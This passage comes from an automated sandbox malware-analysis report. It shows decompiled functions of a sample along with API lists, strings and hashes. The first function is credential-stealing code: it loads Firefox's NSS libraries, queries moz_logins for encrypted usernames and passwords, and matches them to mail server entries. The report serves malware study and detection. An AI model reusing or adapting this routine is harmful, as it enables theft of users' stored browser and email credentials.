				_v28 = _t250;
				_t116 = E0040E54C(_t250, _t115 + 0x362);
				if(_t116 == 0) {
					return _t116;
				}
				_t117 =  *(_t250 + 4);
				_t208 = 0;
				if(_t117 == 0) {
					_t118 = _t117 | 0xffffffff;
				} else {
					_t118 =  *_t117(_a4 + 0x158);
				}
				if(_t118 != _t208) {
					L43:
					return E0040E6B4(_v28);
				} else {
					_v32 = _t208;
					if(E0040FCBC( &_v68, _t245) == 0) {
						L41:
						_t122 =  *((intOrPtr*)(_v28 + 8));
						if(_t122 != _t208) {
							 *_t122();
						}
						goto L43;
					} else {
						_v12 = _t208;
						_v1380 = _t208;
						memset( &_v1378, _t208, 0x208);
						_v852 = _t208;
						memset( &_v851, _t208, 0x104);
						_t261 = _t260 + 0x18;
						MultiByteToWideChar(_t208, _t208, _a8, 0xffffffff,  &_v1380, 0x104);
						WideCharToMultiByte(0xfde9, _t208,  &_v1380, 0xffffffff,  &_v852, 0x104, _t208, _t208);
						if(_v68 != _t208) {
							_v68( &_v852,  &_v12);
						}
						if(_v12 != _t208) {
							_a8 = _t208;
							if(_v64 != _t208) {
								_v64(_v12, "SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins", 0xffffffff,  &_a8,  &_v72);
								_t261 = _t261 + 0x14;
							}
							L11:
							L11:
							if(_v60 == _t208) {
								_t133 = 0xffff;
							} else {
								_t133 = _v60(_a8);
							}
							if(_t133 != 0x64) {
								goto L36;
							}
							_v9372 = _t208;
							memset( &_v9371, _t208, 0x3ff);
							memset( &_v8348, _t208, 0x1400);
							_t262 = _t261 + 0x18;
							_t254 = E0040FE97( &_v68, _a8, 1);
							_t246 = E0040FE97( &_v68, _a8, 6);
							_v8 = E0040FE97( &_v68, _a8, 7);
							_v20 = E0040FE97( &_v68, _a8, 4);
							_v24 = E0040FE97( &_v68, _a8, 5);
							_v16 = E0040FE97( &_v68, _a8, 2);
							if(_t254 != _t208) {
								strcpy( &_v9372, _t254);
							}
							if(_t246 != _t208) {
								strcpy( &_v8348, _t246);
							}
							if(_v8 != _t208) {
								strcpy( &_v7324, _v8);
							}
							if(_v20 != _t208) {
								strcpy( &_v6300, _v20);
							}
							if(_v24 != _t208) {
								strcpy( &_v5276, _v24);
							}
							if(_v16 != _t208) {
								strcpy( &_v4252, _v16);
							}
							_v332 = _t208;
							memset( &_v331, _t208, 0xff);
							_v588 = _t208;
							memset( &_v587, _t208, 0xff);
							_t256 = _a4;
							_t261 = _t262 + 0x18;
							E0040CF02(_v8, _t256,  &_v588);
							E0040CF02(_t246, _t256,  &_v332);
							_v8 = _t208;
							if( *((intOrPtr*)(_t256 + 0x474)) > _t208) {
								_v16 = _t256 + 0x468;
								do {
									_t247 = E0040DA96(_v8, _v16);
									_v3228 = _t208;
									memset( &_v3227, _t208, 0x261);
									_v1996 = _t208;
									memset( &_v1995, _t208, 0x261);
									_v2612 = _t208;
									memset( &_v2611, _t208, 0x261);
									_t84 = _t247 + 0x104; // 0x104
									_t258 = _t84;
									sprintf( &_v3228, "mailbox://%s", _t258);
									sprintf( &_v1996, "imap://%s", _t258);
									sprintf( &_v2612, "smtp://%s", _t258);
									_t261 = _t261 + 0x48;
									_push( &_v4252);
									_t179 =  &_v3228;
									_push(_t179);
									L00412072();
									if(_t179 == 0) {
										L32:
										_t94 = _t247 + 0x204; // 0x204
										_t259 = _t94;
										_t180 =  &_v332;
										_push(_t94);
										_push(_t180);
										L00412072();
										if(_t180 == 0) {
											E004060DA(0xff, _t247 + 0x304,  &_v588);
											E004060DA(0xff, _t259,  &_v332);
											_t208 = 0;
										}
										goto L34;
									}
									_push( &_v4252);
									_t187 =  &_v1996;
									_push(_t187);
									L00412072();
									if(_t187 == 0) {
										goto L32;
									}
									_push( &_v4252);
									_t189 =  &_v2612;
									_push(_t189);
									L00412072();
									if(_t189 != 0) {
										goto L34;
									}
									goto L32;
									L34:
									_v8 =  &(_v8[1]);
								} while (_v8 <  *((intOrPtr*)(_a4 + 0x474)));
							}
							goto L11;
							L36:
							if(_a8 != _t208 && _v44 != _t208) {
								_v44(_a8);
							}
							if(_v40 != _t208) {
								_v40(_v12);
							}
						}
						goto L41;
					}
				}
			}




























































                                                                                                                                                                        0x0040d3bd
                                                                                                                                                                        0x0040d3c2
                                                                                                                                                                        0x0040d3c8
                                                                                                                                                                        0x0040d3ce
                                                                                                                                                                        0x0040d3d2
                                                                                                                                                                        0x0040d3d5
                                                                                                                                                                        0x0040d3dc
                                                                                                                                                                        0x0040d7be
                                                                                                                                                                        0x0040d7be
                                                                                                                                                                        0x0040d3e2
                                                                                                                                                                        0x0040d3e5
                                                                                                                                                                        0x0040d3e9
                                                                                                                                                                        0x0040d3fa
                                                                                                                                                                        0x0040d3eb
                                                                                                                                                                        0x0040d3f5
                                                                                                                                                                        0x0040d3f7
                                                                                                                                                                        0x0040d3ff
                                                                                                                                                                        0x0040d7b2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040d405
                                                                                                                                                                        0x0040d409
                                                                                                                                                                        0x0040d413
                                                                                                                                                                        0x0040d7a6
                                                                                                                                                                        0x0040d7a9
                                                                                                                                                                        0x0040d7ae
                                                                                                                                                                        0x0040d7b0
                                                                                                                                                                        0x0040d7b0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040d419
                                                                                                                                                                        0x0040d426
                                                                                                                                                                        0x0040d429
                                                                                                                                                                        0x0040d430
                                                                                                                                                                        0x0040d443
                                                                                                                                                                        0x0040d449
                                                                                                                                                                        0x0040d44e
                                                                                                                                                                        0x0040d460
                                                                                                                                                                        0x0040d47f
                                                                                                                                                                        0x0040d488
                                                                                                                                                                        0x0040d495
                                                                                                                                                                        0x0040d499
                                                                                                                                                                        0x0040d49d
                                                                                                                                                                        0x0040d4a6
                                                                                                                                                                        0x0040d4a9
                                                                                                                                                                        0x0040d4bd
                                                                                                                                                                        0x0040d4c0
                                                                                                                                                                        0x0040d4c0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040d4c3
                                                                                                                                                                        0x0040d4c6
                                                                                                                                                                        0x0040d4d1
                                                                                                                                                                        0x0040d4c8
                                                                                                                                                                        0x0040d4cb
                                                                                                                                                                        0x0040d4ce
                                                                                                                                                                        0x0040d4d9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040d4ec
                                                                                                                                                                        0x0040d4f2
                                                                                                                                                                        0x0040d504
                                                                                                                                                                        0x0040d509
                                                                                                                                                                        0x0040d51e
                                                                                                                                                                        0x0040d52d
                                                                                                                                                                        0x0040d53c
                                                                                                                                                                        0x0040d54c
                                                                                                                                                                        0x0040d55c
                                                                                                                                                                        0x0040d569
                                                                                                                                                                        0x0040d56c
                                                                                                                                                                        0x0040d576
                                                                                                                                                                        0x0040d57c
                                                                                                                                                                        0x0040d57f
                                                                                                                                                                        0x0040d589
                                                                                                                                                                        0x0040d58f
                                                                                                                                                                        0x0040d593
                                                                                                                                                                        0x0040d59f
                                                                                                                                                                        0x0040d5a5
                                                                                                                                                                        0x0040d5a9
                                                                                                                                                                        0x0040d5b5
                                                                                                                                                                        0x0040d5bb
                                                                                                                                                                        0x0040d5bf
                                                                                                                                                                        0x0040d5cb
                                                                                                                                                                        0x0040d5d1
                                                                                                                                                                        0x0040d5d5
                                                                                                                                                                        0x0040d5e1
                                                                                                                                                                        0x0040d5e7
                                                                                                                                                                        0x0040d5f6
                                                                                                                                                                        0x0040d5fc
                                                                                                                                                                        0x0040d60a
                                                                                                                                                                        0x0040d610
                                                                                                                                                                        0x0040d615
                                                                                                                                                                        0x0040d618
                                                                                                                                                                        0x0040d627
                                                                                                                                                                        0x0040d637
                                                                                                                                                                        0x0040d642
                                                                                                                                                                        0x0040d645
                                                                                                                                                                        0x0040d652
                                                                                                                                                                        0x0040d655
                                                                                                                                                                        0x0040d666
                                                                                                                                                                        0x0040d670
                                                                                                                                                                        0x0040d676
                                                                                                                                                                        0x0040d684
                                                                                                                                                                        0x0040d68a
                                                                                                                                                                        0x0040d698
                                                                                                                                                                        0x0040d69e
                                                                                                                                                                        0x0040d6a3
                                                                                                                                                                        0x0040d6a3
                                                                                                                                                                        0x0040d6b6
                                                                                                                                                                        0x0040d6c8
                                                                                                                                                                        0x0040d6da
                                                                                                                                                                        0x0040d6df
                                                                                                                                                                        0x0040d6e8
                                                                                                                                                                        0x0040d6e9
                                                                                                                                                                        0x0040d6ef
                                                                                                                                                                        0x0040d6f0
                                                                                                                                                                        0x0040d6f9
                                                                                                                                                                        0x0040d72d
                                                                                                                                                                        0x0040d72d
                                                                                                                                                                        0x0040d72d
                                                                                                                                                                        0x0040d733
                                                                                                                                                                        0x0040d739
                                                                                                                                                                        0x0040d73a
                                                                                                                                                                        0x0040d73b
                                                                                                                                                                        0x0040d744
                                                                                                                                                                        0x0040d758
                                                                                                                                                                        0x0040d766
                                                                                                                                                                        0x0040d76d
                                                                                                                                                                        0x0040d76d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040d744
                                                                                                                                                                        0x0040d701
                                                                                                                                                                        0x0040d702
                                                                                                                                                                        0x0040d708
                                                                                                                                                                        0x0040d709
                                                                                                                                                                        0x0040d712
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040d71a
                                                                                                                                                                        0x0040d71b
                                                                                                                                                                        0x0040d721
                                                                                                                                                                        0x0040d722
                                                                                                                                                                        0x0040d72b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040d76f
                                                                                                                                                                        0x0040d76f
                                                                                                                                                                        0x0040d778
                                                                                                                                                                        0x0040d784
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040d789
                                                                                                                                                                        0x0040d78c
                                                                                                                                                                        0x0040d796
                                                                                                                                                                        0x0040d799
                                                                                                                                                                        0x0040d79d
                                                                                                                                                                        0x0040d7a2
                                                                                                                                                                        0x0040d7a5
                                                                                                                                                                        0x0040d79d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040d49d
                                                                                                                                                                        0x0040d413

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040E54C: memset.MSVCRT ref: 0040E56D
                                                                                                                                                                          • Part of subcall function 0040E54C: GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040E59C
                                                                                                                                                                          • Part of subcall function 0040E54C: SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040E5A9
                                                                                                                                                                          • Part of subcall function 0040E54C: memset.MSVCRT ref: 0040E5C0
                                                                                                                                                                          • Part of subcall function 0040E54C: strlen.MSVCRT ref: 0040E5CA
                                                                                                                                                                          • Part of subcall function 0040E54C: strlen.MSVCRT ref: 0040E5D8
                                                                                                                                                                          • Part of subcall function 0040E54C: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E611
                                                                                                                                                                          • Part of subcall function 0040E54C: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E62D
                                                                                                                                                                          • Part of subcall function 0040E54C: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E645
                                                                                                                                                                          • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040E65A
                                                                                                                                                                          • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E666
                                                                                                                                                                          • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E672
                                                                                                                                                                          • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E67E
                                                                                                                                                                          • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E68A
                                                                                                                                                                          • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E696
                                                                                                                                                                        • memset.MSVCRT ref: 0040D430
                                                                                                                                                                        • memset.MSVCRT ref: 0040D449
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,0040D954,000000FF,?,00000104,00000104,00000000,?,0040D954,?,00000000), ref: 0040D460
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,0040D954,?,00000000), ref: 0040D47F
                                                                                                                                                                        • memset.MSVCRT ref: 0040D4F2
                                                                                                                                                                        • memset.MSVCRT ref: 0040D504
                                                                                                                                                                        • strcpy.MSVCRT(?,00000000,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D576
                                                                                                                                                                        • strcpy.MSVCRT(?,00000000,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D589
                                                                                                                                                                        • strcpy.MSVCRT(?,00000000,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D59F
                                                                                                                                                                        • strcpy.MSVCRT(?,?,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D5B5
                                                                                                                                                                        • strcpy.MSVCRT(?,?,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D5CB
                                                                                                                                                                        • strcpy.MSVCRT(?,0040D954,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D5E1
                                                                                                                                                                        • memset.MSVCRT ref: 0040D5FC
                                                                                                                                                                        • memset.MSVCRT ref: 0040D610
                                                                                                                                                                        • memset.MSVCRT ref: 0040D676
                                                                                                                                                                        • memset.MSVCRT ref: 0040D68A
                                                                                                                                                                        • memset.MSVCRT ref: 0040D69E
                                                                                                                                                                        • sprintf.MSVCRT ref: 0040D6B6
                                                                                                                                                                        • sprintf.MSVCRT ref: 0040D6C8
                                                                                                                                                                        • sprintf.MSVCRT ref: 0040D6DA
                                                                                                                                                                        • _stricmp.MSVCRT(?,?), ref: 0040D6F0
                                                                                                                                                                        • _stricmp.MSVCRT(?,?), ref: 0040D709
                                                                                                                                                                        • _stricmp.MSVCRT(?,?), ref: 0040D722
                                                                                                                                                                        • _stricmp.MSVCRT(?,00000204), ref: 0040D73B
                                                                                                                                                                        Strings
                                                                                                                                                                        • mailbox://%s, xrefs: 0040D6B0
                                                                                                                                                                        • smtp://%s, xrefs: 0040D6D4
                                                                                                                                                                        • SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins, xrefs: 0040D4B5
                                                                                                                                                                        • imap://%s, xrefs: 0040D6C2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$AddressProcstrcpy$_stricmp$sprintf$ByteCharCurrentDirectoryLibraryLoadMultiWidestrlen$HandleModule
                                                                                                                                                                        • String ID: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins$imap://%s$mailbox://%s$smtp://%s
                                                                                                                                                                        • API String ID: 2893247534-4245710904
                                                                                                                                                                        • Opcode ID: b9c130291edcc358c326a525934ef701acbcd93509fe00eddc44c50268657f0e
                                                                                                                                                                        • Instruction ID: a8d77792ad7cee7e4ffb55223bde2ad9b6e4b2884a1795ffa9bad40f06226133
                                                                                                                                                                        • Opcode Fuzzy Hash: b9c130291edcc358c326a525934ef701acbcd93509fe00eddc44c50268657f0e
                                                                                                                                                                        • Instruction Fuzzy Hash: FEC12D72D04119AEDB20DAA5DD859DEB7BCEF04314F1441BBF609F2191DA389E888B58
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040EB15 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 98%
                                                                                                                                                                        			E0040EB15(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, struct HDC__* _a16, long _a20, long _a24, intOrPtr _a28, signed int _a32, long _a36, intOrPtr _a40, struct tagPOINT _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, struct tagPOINT _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, char _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, long _a96, struct tagPOINT _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, struct tagSIZE _a116, struct tagRECT _a124, intOrPtr _a128, intOrPtr _a136, char _a336) {
				signed int _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v28;
				intOrPtr _v44;
				struct HWND__* _v48;
				struct HWND__* _v52;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				struct HDC__* _t169;
				struct HWND__* _t171;
				intOrPtr _t223;
				void* _t224;
				intOrPtr _t235;
				struct HWND__* _t237;
				void* _t240;
				intOrPtr* _t274;
				signed int _t275;
				signed int _t276;

				_t274 = __esi;
				_t276 = _t275 & 0xfffffff8;
				E00412360(0x2198, __ecx);
				_a12 =  *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b4));
				_t237 = GetDlgItem( *(__esi + 4), 0x3e9);
				_a4 = GetDlgItem( *(__esi + 4), 0x3e8);
				_a20 = GetWindowLongA(_t237, 0xfffffff0);
				_a24 = GetWindowLongA(_a4, 0xfffffff0);
				_a96 = GetWindowLongA(_t237, 0xffffffec);
				_a36 = GetWindowLongA(_a4, 0xffffffec);
				GetWindowRect(_t237,  &_a100);
				GetWindowRect(_a4,  &_a60);
				MapWindowPoints(0,  *(__esi + 4),  &_a100, 2);
				MapWindowPoints(0,  *(__esi + 4),  &_a60, 2);
				_t240 = _a108 - _a100.x;
				_a4 = _a4 & 0x00000000;
				_a28 = _a68 - _a60.x;
				_a76 = _a112 - _a104;
				_a40 = _a72 - _a64;
				_t169 = GetDC( *(__esi + 4));
				_a16 = _t169;
				if(_t169 == 0) {
					L9:
					_v0 = _v0 & 0x00000000;
					if( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)) <= 0) {
						L12:
						_t171 = GetDlgItem( *(_t274 + 4), 1);
						_a36 = _t171;
						GetWindowRect(_t171,  &_a44);
						MapWindowPoints(0,  *(_t274 + 4),  &_a44, 2);
						GetClientRect( *(_t274 + 4),  &_a124);
						GetWindowRect( *(_t274 + 4),  &_a80);
						SetWindowPos( *(_t274 + 4), 0, 0, 0, _a88 - _a80 + 1, _a128 - _a136 - _a48 - _a84 + _a56 + _a92 + _a4 + 0x15, 0x206);
						GetClientRect( *(_t274 + 4),  &_a80);
						return SetWindowPos(_a36, 0, _a44.x, _a48 - _a56 - _a84 + _a92 - 5, _a52 - _a44 + 1, _a56 - _a48 + 1, 0x204);
					}
					_a20 = _a20 | 0x10000000;
					_a24 = _a24 | 0x10000000;
					_a8 = _a12 + 0x10;
					do {
						 *((intOrPtr*)( *_t274 + 0x1c))(_v0);
						_v20 = E0040150C(_t274, _a92, "STATIC", _a16, _a96, _v0 + _a100.x, _t240, _a72);
						_v44 = E0040150C(_t274, _a4, "EDIT", _v8, _a28, _v28 + _a32, _v4,  *(_t274 + 0x14) * _a8);
						sprintf( &_a80, "%s:", _v52->i);
						_t276 = _t276 + 0xc;
						SetWindowTextA(_v48,  &_a80);
						SetWindowTextA(_v52,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0xc))))))(_v60,  &_a336));
						_v60 = _v60 + 0x14;
						_v64 = _v64 +  *(_t274 + 0x14) * _v28 +  *((intOrPtr*)(_t274 + 0x18));
						_v68 = _v68 + 1;
					} while (_v68 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
					goto L12;
				}
				_t223 = 0;
				_a32 = _a32 & 0;
				_a8 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b0)) <= 0) {
					L8:
					_t224 = _t223 - _t240;
					_a28 = _a28 - _t224;
					_a60.x = _a60.x + _t224;
					_t240 = _t240 + _t224;
					ReleaseDC( *(_t274 + 4), _a16);
					goto L9;
				}
				_v0 = _a12 + 0x10;
				do {
					if(GetTextExtentPoint32A(_a16,  *_v0, strlen( *_v0),  &_a116) != 0) {
						_t235 = _a100.x + 0xa;
						if(_t235 > _v8) {
							_v8 = _t235;
						}
					}
					_a16 =  &(_a16->i);
					_v16 = _v16 + 0x14;
				} while (_a16 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
				_t223 = _v8;
				goto L8;
			}

























                                                                                                                                                                        0x0040eb15
                                                                                                                                                                        0x0040eb18
                                                                                                                                                                        0x0040eb20
                                                                                                                                                                        0x0040eb3e
                                                                                                                                                                        0x0040eb4c
                                                                                                                                                                        0x0040eb59
                                                                                                                                                                        0x0040eb65
                                                                                                                                                                        0x0040eb6e
                                                                                                                                                                        0x0040eb7a
                                                                                                                                                                        0x0040eb86
                                                                                                                                                                        0x0040eb90
                                                                                                                                                                        0x0040eb9b
                                                                                                                                                                        0x0040ebaf
                                                                                                                                                                        0x0040ebbd
                                                                                                                                                                        0x0040ebce
                                                                                                                                                                        0x0040ebd2
                                                                                                                                                                        0x0040ebd7
                                                                                                                                                                        0x0040ebe6
                                                                                                                                                                        0x0040ebf2
                                                                                                                                                                        0x0040ebf6
                                                                                                                                                                        0x0040ebfe
                                                                                                                                                                        0x0040ec02
                                                                                                                                                                        0x0040ec9a
                                                                                                                                                                        0x0040ec9d
                                                                                                                                                                        0x0040eca9
                                                                                                                                                                        0x0040edb7
                                                                                                                                                                        0x0040edbc
                                                                                                                                                                        0x0040edc8
                                                                                                                                                                        0x0040edcc
                                                                                                                                                                        0x0040edda
                                                                                                                                                                        0x0040edf1
                                                                                                                                                                        0x0040edfb
                                                                                                                                                                        0x0040ee41
                                                                                                                                                                        0x0040ee4b
                                                                                                                                                                        0x0040ee8a
                                                                                                                                                                        0x0040ee8a
                                                                                                                                                                        0x0040ecba
                                                                                                                                                                        0x0040eccb
                                                                                                                                                                        0x0040eccf
                                                                                                                                                                        0x0040ecd3
                                                                                                                                                                        0x0040ecdb
                                                                                                                                                                        0x0040ed0d
                                                                                                                                                                        0x0040ed3d
                                                                                                                                                                        0x0040ed54
                                                                                                                                                                        0x0040ed59
                                                                                                                                                                        0x0040ed68
                                                                                                                                                                        0x0040ed86
                                                                                                                                                                        0x0040ed97
                                                                                                                                                                        0x0040ed9c
                                                                                                                                                                        0x0040eda0
                                                                                                                                                                        0x0040edab
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040ecd3
                                                                                                                                                                        0x0040ec0b
                                                                                                                                                                        0x0040ec0d
                                                                                                                                                                        0x0040ec17
                                                                                                                                                                        0x0040ec1b
                                                                                                                                                                        0x0040ec81
                                                                                                                                                                        0x0040ec85
                                                                                                                                                                        0x0040ec8a
                                                                                                                                                                        0x0040ec8e
                                                                                                                                                                        0x0040ec92
                                                                                                                                                                        0x0040ec94
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040ec94
                                                                                                                                                                        0x0040ec24
                                                                                                                                                                        0x0040ec28
                                                                                                                                                                        0x0040ec4f
                                                                                                                                                                        0x0040ec58
                                                                                                                                                                        0x0040ec5f
                                                                                                                                                                        0x0040ec61
                                                                                                                                                                        0x0040ec61
                                                                                                                                                                        0x0040ec5f
                                                                                                                                                                        0x0040ec65
                                                                                                                                                                        0x0040ec70
                                                                                                                                                                        0x0040ec75
                                                                                                                                                                        0x0040ec7d
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                                        • String ID: %s:$EDIT$STATIC
                                                                                                                                                                        • API String ID: 1703216249-3046471546
                                                                                                                                                                        • Opcode ID: 0602b39e8c66a6b3299f776a9e3d4c07d3cdec416fd91f858be2a38e870d1518
                                                                                                                                                                        • Instruction ID: 954468ae603e5140b8f73852e098bd997e11b992376cfaf7be677857a6fc3954
                                                                                                                                                                        • Opcode Fuzzy Hash: 0602b39e8c66a6b3299f776a9e3d4c07d3cdec416fd91f858be2a38e870d1518
                                                                                                                                                                        • Instruction Fuzzy Hash: AAB1EF71108341AFD710DF69C985E6BBBE9FF88704F008A2DF699922A0DB75E914CF16
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040E197 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 220windowstringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                                                        			E0040E197(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, void _a10, unsigned int _a12, void _a264, void _a265, void _a520, void _a521, void _a776, void _a780, char _a784, char _a1056, void _a1057, char _a2080, void _a2081, char _a3104, void _a3105) {
				char _v0;
				struct HWND__* _v4;
				void* __edi;
				void* _t44;
				void* _t58;
				int _t59;
				int _t61;
				int _t62;
				long _t66;
				struct HWND__* _t93;
				intOrPtr _t122;
				unsigned int _t125;
				signed int _t127;
				signed int _t128;
				void* _t134;

				_t128 = _t127 & 0xfffffff8;
				E00412360(0x1424, __ecx);
				_t44 = _a8 - 0x110;
				if(_t44 == 0) {
					E0040649B(__edx, _a4);
					 *_t128 = 0x7ff;
					_a3104 = 0;
					memset( &_a3105, 0, ??);
					asm("movsd");
					asm("movsd");
					asm("movsw");
					memset( &_a10, 0, 0xfb);
					_a520 = 0;
					memset( &_a521, 0, 0xff);
					_a264 = 0;
					memset( &_a265, 0, 0xff);
					_a1056 = 0;
					memset( &_a1057, 0, 0x3ff);
					_a2080 = 0;
					memset( &_a2081, 0, 0x3ff);
					_t134 = _t128 + 0x48;
					_t58 = GetCurrentProcess();
					_t102 =  &_a520;
					_v4 = _t58;
					_t59 = ReadProcessMemory(_t58,  *0x417c64,  &_a520, 0x80, 0);
					__eflags = _t59;
					if(_t59 != 0) {
						E004065B4( &_a1056,  &_a520, 4);
						_pop(_t102);
					}
					_t61 = ReadProcessMemory(_v4,  *0x417c58,  &_a264, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E004065B4( &_a2080,  &_a264, 0);
						_pop(_t102);
					}
					_t62 = E004062A6();
					__eflags = _t62;
					if(_t62 == 0) {
						E0040E6C7();
					} else {
						E0040E74B();
					}
					__eflags =  *0x418514;
					if(__eflags != 0) {
						L17:
						_a776 = 0;
						memset( &_a780, 0, 0x114);
						_t122 =  *0x417e7c; // 0x0
						_t134 = _t134 + 0xc;
						_t66 = GetCurrentProcessId();
						 *0x418108 = 0;
						E0040E8C6(_t102, __eflags, _t66, _t122);
						__eflags =  *0x418108;
						if( *0x418108 != 0) {
							memcpy( &_a776, 0x417ff0, 0x118);
							_t134 = _t134 + 0xc;
							__eflags =  *0x418108;
							if( *0x418108 != 0) {
								strcpy( &_v0, E004061F0( &_a784));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x418518;
						if(__eflags == 0) {
							L20:
							sprintf( &_a3104, "Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n",  *0x417e70,  *0x417e7c,  &_v0,  *0x417c50,  *0x417c44,  *0x417c4c,  *0x417c48,  *0x417c40,  *0x417c3c,  *0x417c54,  *0x417c64,  *0x417c58,  &_a1056,  &_a2080);
							SetDlgItemTextA(_a4, 0x3ea,  &_a3104);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t44 == 1) {
					_t125 = _a12;
					if(_t125 >> 0x10 == 0) {
						if(_t125 == 3) {
							_t93 = GetDlgItem(_a4, 0x3ea);
							_v4 = _t93;
							SendMessageA(_t93, 0xb1, 0, 0xffff);
							SendMessageA(_v4, 0x301, 0, 0);
							SendMessageA(_v4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}


















                                                                                                                                                                        0x0040e19a
                                                                                                                                                                        0x0040e1a2
                                                                                                                                                                        0x0040e1aa
                                                                                                                                                                        0x0040e1b2
